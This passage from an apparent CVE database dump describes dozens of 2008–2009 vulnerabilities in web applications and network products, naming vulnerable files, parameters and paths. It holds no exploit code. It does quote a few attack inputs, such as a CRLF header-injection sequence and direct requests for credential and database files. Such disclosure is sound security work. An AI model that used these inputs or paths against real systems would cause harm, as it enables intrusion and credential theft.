vulnerability in Windows Search 4.0 for Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted file that appears in a preview in a search result, aka "Script Execution in Windows Search Vulnerability." [CVE-2009-0214] Unspecified vulnerability in the WebFGServer application in AREVA e-terrahabitat 5.7 and earlier allows remote authenticated users to gain privileges via unknown vectors, aka PD32022. [CVE-2009-0212] Unspecified vulnerability in the WebFGServer application in AREVA e-terrahabitat 5.7 and earlier allows remote attackers to cause a denial of service (system crash) via unknown vectors, aka PD32020. [CVE-2009-0211] Unspecified vulnerability in the WebFGServer application in AREVA e-terrahabitat 5.7 and earlier allows remote attackers to cause a denial of service (system crash) via unknown vectors, aka PD32018. [CVE-2009-0204] Cross-site scripting (XSS) vulnerability in HP Select Access 6.1 and 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-0194] The domain-locking implementation in the GARMINAXCONTROL.GarminAxControl_t.1 ActiveX control in npGarmin.dll in the Garmin Communicator Plug-In 2.6.4.0 does not properly enforce the restrictions that (1) download and (2) upload requests come from a web site specified by the user, which allows remote attackers to obtain sensitive information or reconfigure Garmin GPS devices via unspecified vectors related to a "synchronisation error." [CVE-2009-0162] Cross-site scripting (XSS) vulnerability in Safari before 3.2.3, and 4 Public Beta, on Apple Mac OS X 10.5 before 10.5.7 and Windows allows remote attackers to inject arbitrary web script or HTML via a crafted feed: URL. [CVE-2009-0157] Heap-based buffer overflow in CFNetwork in Apple Mac OS X 10.5 before 10.5.7 allows remote web servers to execute arbitrary code or cause a denial of service (application crash) via long HTTP headers. [CVE-2009-0120] The IBM WebSphere DataPower XML Security Gateway XS40 with firmware 3.6.1.5 allows remote attackers to cause a denial of service (device reboot) by sending data over an established SSL connection, as demonstrated by the abc\r\n\r\n string data. [CVE-2009-0107] Cross-site scripting (XSS) vulnerability in profile.php in PHPAuctions (aka PHPAuctionSystem) allows remote attackers to inject arbitrary web script or HTML via the user_id parameter. [CVE-2009-0105] Cross-site scripting (XSS) vulnerability in index.php in EZpack 4.2b2 allows remote attackers to inject arbitrary web script or HTML via the mdfd parameter in a prog action. [CVE-2009-0104] SQL injection vulnerability in index.php in EZpack 4.2b2 allows remote attackers to execute arbitrary SQL commands via the qType parameter in a webboard prog action. [CVE-2009-0094] The WINS server in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 does not restrict registration of the (1) "wpad" and (2) "isatap" NetBIOS names, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) and Intra-Site Automatic Tunnel Addressing Protocol (ISATAP) features, and conduct man-in-the-middle attacks by spoofing a proxy server or ISATAP route, by registering one of these names in the WINS database, aka "WPAD WINS Server Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0093] Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not restrict registration of the "wpad" hostname, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) feature, and conduct man-in-the-middle attacks by spoofing a proxy server, via a Dynamic Update request for this hostname, aka "DNS Server Vulnerability in WPAD Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0089] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Vista Gold allows remote web servers to impersonate arbitrary https web sites by using DNS spoofing to "forward a connection" to a different https web site that has a valid certificate matching its own domain name, but not a certificate matching the domain name of the host requested by the user, aka "Windows HTTP Services Certificate Name Mismatch Vulnerability." [CVE-2009-0081] The graphics device interface (GDI) implementation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate input received from user mode, which allows remote attackers to execute arbitrary code via a crafted (1) Windows Metafile (aka WMF) or (2) Enhanced Metafile (aka EMF) image file, aka "Windows Kernel Input Validation Vulnerability." [CVE-2009-0063] Cross-site scripting (XSS) vulnerability in the Control Center in Symantec Brightmail Gateway Appliance before 8.0.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-0059] The Cisco Wireless LAN Controller (WLC), Cisco Catalyst 6500 Wireless Services Module (WiSM), and Cisco Catalyst 3750 Integrated Wireless LAN Controller with software 4.x before 4.2.176.0 and 5.2.x before 5.2.157.0 allow remote attackers to cause a denial of service (device reload) via a web authentication (aka WebAuth) session that includes a malformed POST request to login.html. [CVE-2009-0058] The Cisco Wireless LAN Controller (WLC), Cisco Catalyst 6500 Wireless Services Module (WiSM), and Cisco Catalyst 3750 Integrated Wireless LAN Controller with software 4.x before 4.2.176.0 and 5.x before 5.2 allow remote attackers to cause a denial of service (web authentication outage or device reload) via unspecified network traffic, as demonstrated by a vulnerability scanner. [CVE-2009-0056] Cross-site request forgery (CSRF) vulnerability in the administration interface in Cisco IronPort Encryption Appliance 6.2.4 before 6.2.4.1.1, 6.2.5, 6.2.6, 6.2.7 before 6.2.7.7, 6.3 before 6.3.0.4, and 6.5 before 6.5.0.2 [CVE-2009-0055] Cross-site request forgery (CSRF) vulnerability in the administration interface in Cisco IronPort Encryption Appliance 6.2.4 before 6.2.4.1.1, 6.2.5, 6.2.6, 6.2.7 before 6.2.7.7, 6.3 before 6.3.0.4, and 6.5 before 6.5.0.2 [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown. [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring [CVE-2009-0027] The request handler in JBossWS in JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP06 and 4.3 before 4.3.0.CP04 does not properly validate the resource path during a request for a WSDL file with a custom web-service endpoint, which allows remote attackers to read arbitrary XML files via a crafted request. [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp. [CVE-2008-7312] The Filtering Service in Websense Enterprise 5.2 through 6.3 does not consider the IP address during URL categorization, which makes it easier for remote attackers to bypass filtering via an HTTP request, as demonstrated by a request to a compromised server associated with a specific IP address. [CVE-2008-7279] The CustomerInterface component in Open Ticket Request System (OTRS) before 2.2.8 allows remote authenticated users to bypass intended access restrictions and access tickets of arbitrary customers via unspecified vectors. [CVE-2008-7276] Kernel/System/Web/Request.pm in Open Ticket Request System (OTRS) before 2.3.2 creates a directory under /tmp/ with 1274 permissions, which might allow local users to bypass intended access restrictions via standard filesystem operations, related to incorrect interpretation of 0700 as a decimal value. [CVE-2008-7275] Multiple cross-site scripting (XSS) vulnerabilities in Open Ticket Request System (OTRS) before 2.3.3 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) AgentTicketMailbox or (2) CustomerTicketOverView. [CVE-2008-7274] IBM WebSphere Application Server (WAS) 6.1.0.9, when the JAAS Login functionality is enabled, allows attackers to perform an internal application hashtable login by (1) not providing a password or (2) providing an empty password. [CVE-2008-7271] Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE, possibly 3.3.2, allow remote attackers to inject arbitrary web script or HTML via (1) the searchWord parameter to help/advanced/searchView.jsp or (2) the workingSet parameter in an add action to help/advanced/workingSetManager.jsp, a different issue than CVE-2010-4647. [CVE-2008-7269] Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action. [CVE-2008-7266] Cross-site scripting (XSS) vulnerability in an unspecified Shockwave Flash file in RSA Adaptive Authentication 2.x and 5.7.x allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-7257] CRLF injection vulnerability in +webvpn+/index.html in WebVPN on Cisco Adaptive Security Appliances (ASA) 5580 series devices with software before 8.1(2) allows remote attackers to inject arbitrary HTTP headers as demonstrated by a redirect attack involving a %0d%0aLocation%3a sequence in a URI, or conduct HTTP response splitting attacks via unspecified vectors, aka Bug ID CSCsr09163. [CVE-2008-7253] The default configuration of the web server in IBM Lotus Domino Server, possibly 6.0 through 8.0, enables the HTTP TRACE method, which makes it easier for remote attackers to steal cookies and authentication credentials via a cross-site tracing (XST) attack, a related issue to CVE-2004-2763 and CVE-2005-3398. [CVE-2008-7250] Cross-site scripting (XSS) vulnerability in Squid Analysis Report Generator (Sarg) 2.2.4 allows remote attackers to inject arbitrary web script or HTML via a JavaScript onload event in the User-Agent header, which is not properly handled when displaying the Squid proxy log. NOTE: this issue exists because of an incomplete fix for CVE-2008-1168. [CVE-2008-7242] Multiple cross-site scripting (XSS) vulnerabilities in MODx CMS 0.9.6.1 and 0.9.6.1p1 allo remote attackers to inject arbitrary web script or HTML via the (1) search, (2) "a," (3) messagesubject, and (4) messagebody parameters to certain pages as reachable from manager/index.php [CVE-2008-7240] Directory traversal vulnerability in include/unverified.inc.php in Linux Web Shop (LWS) php User Base 1.3beta allows remote attackers to include and execute arbitrary local files via the template parameter. [CVE-2008-7231] Cross-site scripting (XSS) vulnerability in Meridio Document and Records Management before 4.3 SR1 allows remote authenticated users to inject arbitrary web script or HTML via the Title field in a (1) document (subGeneralProps:dmpvDocTitle:PROP_W_title) or (2) container (subGeneralProps:dmpvContainerTitle:PROP_W_title). [CVE-2008-7223] Multiple cross-site scripting (XSS) vulnerabilities in LinPHA before 1.3.3 allow remote attackers to inject arbitrary web script or HTML via (1) ftp/index.php, (2) viewer.php, (3) functions/other.php, (4) include/left_menu.class.php, or (5) plugins/stats/stats_view.php. [CVE-2008-7222] Cross-site scripting (XSS) vulnerability in system/admin.php in RunCMS 1.6.1 allows remote attackers to inject arbitrary web script or HTML via the rank_title parameter in a RankForumAdd action. [CVE-2008-7213] Cross-site scripting (XSS) vulnerability in mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php in MOStlyCE before 2.4, as used in Mambo 4.6.3 and earlier, allows remote attackers to inject arbitrary web script or HTML via the Command parameter. [CVE-2008-7202] Multiple cross-site scripting (XSS) vulnerabilities in OpenWebMail before 2.53 (Stable) allow remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-7184] Cross-site scripting (XSS) vulnerability in Diigo Toolbar and Diigolet allows remote attackers to inject arbitrary web script or HTML via a public comment. [CVE-2008-7175] Cross-site scripting (XSS) vulnerability in wp-admin/admin.php in NextGEN Gallery 0.96 and earlier plugin for Wordpress allows remote attackers to inject arbitrary web script or HTML via the picture description field in a page edit action. [CVE-2008-7171] Multiple cross-site scripting (XSS) vulnerabilities in Lightweight news portal (LNP) 1.0b allow remote attackers to inject arbitrary web script or HTML via the (1) photo parameter to show_photo.php, (2) potd parameter to show_potd.php, or (3) the Current question field in a vote action to admin.php. [CVE-2008-7150] Cross-site scripting (XSS) vulnerability in Refine by Taxonomy 5.x before 5.x-0.1, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via a taxonomy term, which is not properly handled by refine_by_taxo when displaying tags. [CVE-2008-7147] Multiple cross-site scripting (XSS) vulnerabilities in IntraLearn Software IntraLearn 2.1, and possibly other versions before 4.2.3, allow remote attackers to inject arbitrary web script or HTML via the (1) outline and (2) course parameters to library/description_link.cfm, or the (3) records_to_display and (4) the_start parameters to library/courses_catalog.cfm. [CVE-2008-7141] Cross-site scripting (XSS) vulnerability in setup.php in @lex Poll 2.1 allows remote attackers to inject arbitrary web script or HTML via the language_setup parameter. NOTE: the provenance of this information is unknown [CVE-2008-7140] Multiple cross-site scripting (XSS) vulnerabilities in @lex Guestbook 4.0.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) language_setup parameter to setup.php or (2) test parameter to index.php. NOTE: the provenance of this information is unknown [CVE-2008-7134] Multiple cross-site scripting (XSS) vulnerabilities in the default URI in Chris LaPointe RedGalaxy Download Center 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) file parameter, (2) message parameter in a login action, (3) category parameter in a browse action, (4) now parameter, or (5) search parameter in a search_results action. NOTE: the provenance of this information is unknown [CVE-2008-7133] Multiple cross-site scripting (XSS) vulnerabilities in onlinetools.org EasyImageCatalogue 1.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) search and (2) d index.php parameters to index.php, (3) dir parameter to thumber.php, and the d parameter to (4) describe.php and (5) addcomment.php. NOTE: the provenance of this information is unknown [CVE-2008-7132] Cross-site scripting (XSS) vulnerability in index.php in Nuked-Klan 1.3 beta allows remote attackers to inject arbitrary web script or HTML via the nuked_nude parameter. NOTE: the provenance of this information is unknown [CVE-2008-7121] Cross-site scripting (XSS) vulnerability in Mr. CGI Guy Hot Links SQL-PHP 3 and earlier allows remote attackers to inject arbitrary web script or HTML via the search bar. [CVE-2008-7119] SQL injection vulnerability in item.php in WeBid auction script 0.5.4 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2008-7118] WeBid auction script 0.5.4 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain SQL query logs via a direct request for logs/cron.log. [CVE-2008-7117] eledicss.php in WeBid auction script 0.5.4 allows remote attackers to modify arbitrary cascading style sheets (CSS) files via a certain request with the file parameter set to style.css. NOTE: this can probably be leveraged for cross-site scripting (XSS) attacks. [CVE-2008-7116] SQL injection vulnerability in the admin panel (admin/) in WeBid auction script 0.5.4 allows remote attackers to execute arbitrary SQL commands via the username. [CVE-2008-7108] Multiple cross-site scripting (XSS) vulnerabilities in Carmosa phpCart 3.4 through 4.6.4 allow remote attackers to inject arbitrary web script or HTML via the (1) quantity or (2) Add Engraving fields to the default URI [CVE-2008-7107] easdrv.sys in ESET Smart Security 3.0.667.0 allows local users to cause a denial of service (crash) via a crafted IOCTL 0x222003 request to the \\.\easdrv device interface. [CVE-2008-7098] Multiple cross-site scripting (XSS) vulnerabilities in Qsoft K-Rate Premium allow remote attackers to inject arbitrary web script or HTML via the blog, possibly the (1) Title and (2) Text fields [CVE-2008-7092] Multiple cross-site scripting (XSS) vulnerabilities in Unica Affinium Campaign 7.2.1.0.55 allow remote attackers to inject arbitrary web script or HTML via a Javascript event in the (1) url, (2) PageName, and (3) title parameters in a CustomBookMarkLink action to Campaign/Campaign [CVE-2008-7089] Cross-site scripting (XSS) vulnerability in Pligg 9.9 and earlier allows remote attackers to inject arbitrary web script or HTML via the keyword parameter in a search action to user.php and other unspecified vectors. [CVE-2008-7084] Directory traversal vulnerability in the web server 1.0 in Velocity Security Management System allows remote attackers to read arbitrary files via a .. (dot dot) in the URI. [CVE-2008-7080] Team PHP PHP Classifieds Script stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain database credentials via a direct request for admin/backup/datadump.sql. [CVE-2008-7073] PHP remote file inclusion vulnerability in lib/action/rss.php in RSS module 0.1 for Pie Web M{a,e}sher, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the lib parameter. [CVE-2008-7072] Cross-site scripting (XSS) vulnerability in index.php in Chipmunk Topsites allows remote attackers to inject arbitrary web script or HTML via the start parameter. [CVE-2008-7069] All Club CMS (ACCMS) 0.0.2 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain database configuration information, including credentials, via a direct request to accms.dat. [CVE-2008-7063] Ocean12 FAQ Manager Pro stores sensitive data under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for admin/o12faq.mdb. [CVE-2008-7060] Multiple cross-site scripting (XSS) vulnerabilities in One-News Beta 2 allow remote attackers to inject arbitrary HTML and web script via the (1) title or (2) content parameters in a news item to add.php, and the (3) itemnum, (4) author, or (5) comment parameters in a comment to index.php. NOTE: vectors 1 and 2 require user authentication. [CVE-2008-7057] Cross-site scripting (XSS) vulnerability in merchandise.php in BandSite CMS 1.1.4 allows remote attackers to inject arbitrary HTML or web script via the type parameter. [CVE-2008-7048] Multiple cross-site scripting (XSS) vulnerabilities in NatterChat 1.12 allow remote attackers to inject arbitrary web script or HTML via the (1) txtUsername parameter to registerDo.asp, as invoked from register.asp, or (2) txtRoomName parameter to room_new.asp. NOTE: these issues might be resultant from XSS in SQL error messages. [CVE-2008-7043] Cross-site scripting (XSS) vulnerability in register.php in FreshScripts Fresh Email Script 1.0 through 1.11 allows remote attackers to inject arbitrary web script or HTML via the Email parameter. NOTE: this can be leveraged to modify cookies and conduct session fixation attacks. [CVE-2008-7039] Cross-site scripting (XSS) vulnerability in admin/comments.php in Gelato CMS 0.95 allows remote attackers to inject arbitrary web script or HTML via the content parameter in a comment. NOTE: some of these details are obtained from third party information. [CVE-2008-7037] The Sidebar gadget in ITN News Gadget (aka ITN Hub Gadget) 1.06 for Windows Vista, and possibly other versions before 1.23, allows remote web servers or man-in-the-middle attackers to execute arbitrary commands via script in a short_title response. [CVE-2008-7036] Multiple cross-site scripting (XSS) vulnerabilities in index.php in DevTracker module 3.0 for bcoos 1.1.11 and earlier, and DevTracker module 0.20 for E-XooPS 1.0.8 and earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) direction and (2) order_by parameters. [CVE-2008-7035] Cross-site scripting (XSS) vulnerability in an unspecified component in Simple Machines phpRaider 1.0.7 allows remote attackers to inject arbitrary web script or HTML via the resistance field. NOTE: the provenance of this information is unknown [CVE-2008-7032] Web Management Console Cross-site request forgery (CSRF) vulnerability in the web management console in F5 BIG-IP 9.4.3 allows remote attackers to hijack the authentication of administrators for requests that create new administrators and execute shell commands, as demonstrated using tmui/Control/form. [CVE-2008-7030] Multiple SQL injection vulnerabilities in Site2Nite Real Estate Web allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password field to an unspecified component, possibly agentlist.asp. NOTE: this issue was disclosed by an unreliable researcher, so it might be incorrect. [CVE-2008-7018] Cross-site scripting (XSS) vulnerability in NashTech Easy PHP Calendar 6.3.25 allows remote attackers to inject arbitrary web script or HTML via the Details field (descr parameter) in an Add New Event action in an unspecified request as generated by an add action in index.php. [CVE-2008-7017] Cross-site scripting (XSS) vulnerability in analyse.php in CAcert 20080921, and possibly other versions before 20080928, allows remote attackers to inject arbitrary web script or HTML via the CN (CommonName) field in the subject of an X.509 certificate. [CVE-2008-7008] HyperStop Web Host Directory 1.2 allows remote attackers to bypass authentication and download a database backup via a direct request to admin/backup/db. [CVE-2008-6994] Stack-based buffer overflow in the SaveAs feature (SaveFileAsWithFilter function) in win_util.cc in Google Chrome 0.2.149.27 allows user-assisted remote attackers to execute arbitrary code via a web page with a long TITLE element, which triggers the overflow when the user saves the page and a long filename is generated. NOTE: it might be possible to exploit this issue via an HTTP response that includes a long filename in a Content-Disposition header. [CVE-2008-6991] SQL injection vulnerability in public/page.php in Websens CMSbright allows remote attackers to execute arbitrary SQL commands via the id_rub_page parameter. [CVE-2008-6988] Multiple cross-site scripting (XSS) vulnerabilities in Easy Photo Gallery (aka Ezphotogallery) 2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) galleryid parameter to gallery.php, and the (2) size or (3) imageid parameters to show.php. [CVE-2008-6987] Unrestricted file upload vulnerability in eZoneScripts Dating Website script allows remote attackers to execute arbitrary code via unknown vectors. NOTE: the provenance of this information is unknown [CVE-2008-6982] Cross-site scripting (XSS) vulnerability in index.php in devalcms 1.4a allows remote attackers to inject arbitrary web script or HTML via the currentpath parameter. [CVE-2008-6979] Cross-site scripting (XSS) vulnerability in as_archives.php in phpAdultSite CMS, possibly 2.3.2, allows remote attackers to inject arbitrary web script or HTML via the results_per_page parameter to index.php. NOTE: some of these details are obtained from third party information. NOTE: this issue might be resultant from a separate SQL injection vulnerability. [CVE-2008-6978] Unrestricted file upload vulnerability in Full Revolution aspWebAlbum 3.2 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in pics/, related to the uploadmedia action in album.asp. [CVE-2008-6977] Cross-site scripting (XSS) vulnerability in album.asp in Full Revolution aspWebAlbum 3.2 allows remote attackers to inject arbitrary web script or HTML via the message parameter in a summary action. [CVE-2008-6973] Multiple unspecified vulnerabilities in IBM WebSphere Commerce 6.0 before 6.0.0.7 have unknown impact and attack vectors. [CVE-2008-6972] Multiple cross-site scripting (XSS) vulnerabilities in Drupal Content Construction Kit (CCK) 5.x through 5.x-1.8 allow remote authenticated users with "administer content" permissions to inject arbitrary web script or HTML via the (1) "field label," (2) "help text," or (3) "allowed values" settings. [CVE-2008-6969] Multiple cross-site scripting (XSS) vulnerabilities in checkout.php in Avactis Shopping Cart 1.8.0 and 1.8.1 allow remote attackers to inject arbitrary web script or HTML via the (1) step_id and (2) CHECKOUT_CZ_BLOWFISH_KEY parameters. [CVE-2008-6965] AJ Square AJ Auction OOPD, Pro Platinum Skin #1, Pro Platinum Skin #2, and Web 2.0 send a redirect but do not exit when certain scripts are called directly, which allows remote attackers to bypass authentication via a direct request to (1) site.php, (2) auction.php, (3) mail.php, (4) fee_setting.php, (5) earnings.php, (6) insertion_fee_settings.php, (7) custom_category.php, (8) subcategory.php, (9) category.php, (10) report.php, (11) store_manager.php, and (12) choose_sell_format.php in admin/, and possibly other vectors. [CVE-2008-6955] mxCamArchive 2.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain configuration details and passwords via a direct request for archive/config.ini. [CVE-2008-6950] Multiple SQL injection vulnerabilities in login.asp in Bankoi WebHosting Control Panel 1.20 allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password field. [CVE-2008-6946] Cross-site scripting (XSS) vulnerability in manageproject.php in Collabtive 0.4.8 allows user-assisted remote attackers to inject arbitrary web script or HTML via the project Name, which is not properly handled when the administrator performs an editform action, related to admin.php. [CVE-2008-6945] Multiple cross-site scripting (XSS) vulnerabilities in Interchange 5.7 before 5.7.1, 5.6 before 5.6.1, and 5.4 before 5.4.3 allow remote attackers to inject arbitrary web script or HTML via (1) the mv_order_item CGI variable parameter in Core, (2) the country-select widget, or (3) possibly the value specifier when used in the UserTag feature. [CVE-2008-6941] SQL injection vulnerability in the login functionality in TurnkeyForms Web Hosting Directory allows remote attackers to execute arbitrary SQL commands via the password field. [CVE-2008-6940] TurnkeyForms Web Hosting Directory stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain a database backup via a direct request to admin/backup/db. [CVE-2008-6939] TurnkeyForms Web Hosting Directory allows remote attackers to bypass authentication and (1) gain administrative privileges by setting the adm cookie to 1 or (2) gain privileges as another user by setting the logged cookie to the target username. [CVE-2008-6938] Pi3Web 2.0.3 before PL2, when installed on Windows as a desktop application and without using the Pi3Web/Conf/Intenet.pi3, allows remote attackers to cause a denial of service (crash or hang) and obtain the full pathname of the server via a request to a file in the ISAPI directory that is not an executable DLL, which triggers the crash when the DLL load fails, as demonstrated using Isapi\users.txt. [CVE-2008-6927] Multiple cross-site scripting (XSS) vulnerabilities in autoinstall4imagesgalleryupgrade.php in the Fantastico De Luxe Module for cPanel allow remote attackers to inject arbitrary web script or HTML via the (1) localapp, (2) updatedir, (3) scriptpath_show, (4) domain_show, (5) thispage, (6) thisapp, and (7) currentversion parameters in an Upgrade action. [CVE-2008-6925] Cross-site scripting (XSS) vulnerability in function.php in Zenphoto 1.1.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the "request logging" feature. NOTE: the provenance of this information is unknown [CVE-2008-6924] Multiple cross-site scripting (XSS) vulnerabilities in register.php in eSyndiCat Directory 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) username, (2) email, (3) password, (4) password2, (5) security_code, and (6) register parameters. [CVE-2008-6915] Cross-site scripting (XSS) vulnerability in view_prop_details.php in Zeeways ZEEPROPERTY 1.0 allows remote attackers to inject arbitrary web script or HTML via the propid parameter. [CVE-2008-6906] Cross-site scripting (XSS) vulnerability in index.php in BabbleBoard 1.1.6 allows remote attackers to inject arbitrary web script or HTML via the username. [CVE-2008-6898] Buffer overflow in the XHTTP Module 4.1.0.0 in the ActiveX control for SaschArt SasCam Webcam Server 2.6.5 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long argument to the Get method and other unspecified methods. [CVE-2008-6894] Multiple cross-site scripting (XSS) vulnerabilities in login.php in 3CX Phone System Free Edition 6.1793 and 6.0.806.0 allow remote attackers to inject arbitrary web script or HTML via the (1) fName and (2) fPassword parameters. [CVE-2008-6893] Cross-site scripting (XSS) vulnerability in Alt-N MDaemon WorldClient 10.0.2, when Internet Explorer 7 is used, allows remote attackers to inject arbitrary web script or HTML via a crafted img tag. [CVE-2008-6891] Multiple cross-site scripting (XSS) vulnerabilities in ASP Forum Script allow remote attackers to inject arbitrary web script or HTML via the (1) forum_id parameter to (a) new_message.asp and (b) messages.asp, and the (2) query string to default.asp. [CVE-2008-6888] Cross-site scripting (XSS) vulnerability in signup.asp in Pre Classified Listings 1.0 allows remote attackers to inject arbitrary web script or HTML via the address parameter. [CVE-2008-6885] Cross-site scripting (XSS) vulnerability in pmlite.php in XOOPS 2.3.1 and 2.3.2a allows remote attackers to inject arbitrary web script or HTML via a STYLE attribute in a URL BBcode tag in a private message. [CVE-2008-6880] SQL injection vulnerability in joke.php in EasySiteNetwork Free Jokes Website allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action. [CVE-2008-6876] Cross-site scripting (XSS) vulnerability in login.php in EsPartenaires 1.0 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: the EsContacts 1.0 issue is covered in CVE-2008-2037. [CVE-2008-6873] SQL injection vulnerability in Active Web Mail 4.0 allows remote attackers to execute arbitrary SQL commands via the TabOpenQuickTab1 parameter to (1) popaccounts.aspx, (2) addressbook.aspx, and (3) emails.aspx. [CVE-2008-6872] ASPThai.NET ASPThai Forums 8.5 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for database/aspthaiForum.mdb. [CVE-2008-6871] Merlix Educate Server stores db.mdb under the web root with insufficient access control, which allows remote attackers to obtain unspecified sensitive information via a direct request. [CVE-2008-6869] Oramon Oracle Database Monitoring Tool 2.0.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing credentials via a direct request for config/oramon.ini. [CVE-2008-6868] Cross-site scripting (XSS) vulnerability in default/login.php in EditeurScripts EsBaseAdmin 2.1 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: the EsContacts 1.0 issue is covered in CVE-2008-2037. [CVE-2008-6850] Cross-site scripting (XSS) vulnerability in messages.php in PHP-Fusion 6.01.17 and 7.00.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-6848] Cross-site scripting (XSS) vulnerability in index.php in phpGreetCards 3.7 allows remote attackers to inject arbitrary web script or HTML via the category parameter in a select action. [CVE-2008-6847] Cross-site scripting (XSS) vulnerability in Employee/emp_login.asp in Pre ASP Job Board allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2008-6840] Multiple PHP remote file inclusion vulnerabilities in V-webmail 1.6.4 allow remote attackers to execute arbitrary PHP code via a URL in the (1) CONFIG[pear_dir] parameter to (a) Mail/RFC822.php, (b) Net/Socket.php, (c) XML/Parser.php, (d) XML/Tree.php, (e) Mail/mimeDecode.php, (f) Console/Getopt.php, (g) System.php, (h) Log.php, and (i) File.php in includes/pear/ [CVE-2008-6839] Multiple cross-site scripting (XSS) vulnerabilities in TGS Content Management 0.3.2r2 allow remote attackers to inject arbitrary web script or HTML via the (1) msg and (2) goodmsg parameters to (a) login.php and (b) index.php, and the (3) dir and (4) id parameters to index.php. NOTE: the provenance of this information is unknown [CVE-2008-6838] Cross-site scripting (XSS) vulnerability in search.php in Zoph 0.7.2.1 allows remote attackers to inject arbitrary web script or HTML via the _off parameter. NOTE: the provenance of this information is unknown [CVE-2008-6835] Cross-site scripting (XSS) vulnerability in OpenID 5.x before 5.x-1.2, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-6831] Multiple cross-site scripting (XSS) vulnerabilities in Atlassian JIRA Enterprise Edition 3.13 allow remote attackers to inject arbitrary web script or HTML via the (1) fullname (Full Name) parameter in the ViewProfile page or (2) returnUrl parameter in a form, as demonstrated using secure/AddComment!default.jspa (aka "Add Comment"). [CVE-2008-6824] The management interface on the A-LINK WL54AP3 and WL54AP2 access points has a blank default password for the admin account, which makes it easier for remote attackers to obtain access. [CVE-2008-6823] Multiple cross-site request forgery (CSRF) vulnerabilities in the management interface on the A-LINK WL54AP3 and WL54AP2 access points before firmware 1.4.2-eng1 allow remote attackers to hijack the authentication of administrators for requests that (1) modify the network configuration via certain parameters to goform/formWanTcpipSetup or (2) modify credentials via certain parameters to goform/formPasswordSetup. [CVE-2008-6813] SQL injection vulnerability in index.php in phpWebNews 0.2 MySQL Edition allows remote attackers to execute arbitrary SQL commands via the id_kat parameter. [CVE-2008-6812] SQL injection vulnerability in bukutamu.php in phpWebNews 0.2 MySQL Edition allows remote attackers to execute arbitrary SQL commands via the det parameter. [CVE-2008-6770] YourPlace 1.0.2 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to a database containing user credentials via a direct request for users.txt. [CVE-2008-6764] Cross-site scripting (XSS) vulnerability in login.php in Silentum LoginSys 1.0.0 allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2008-6762] Open redirect vulnerability in wp-admin/upgrade.php in WordPress, probably 2.6.x, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the backto parameter. 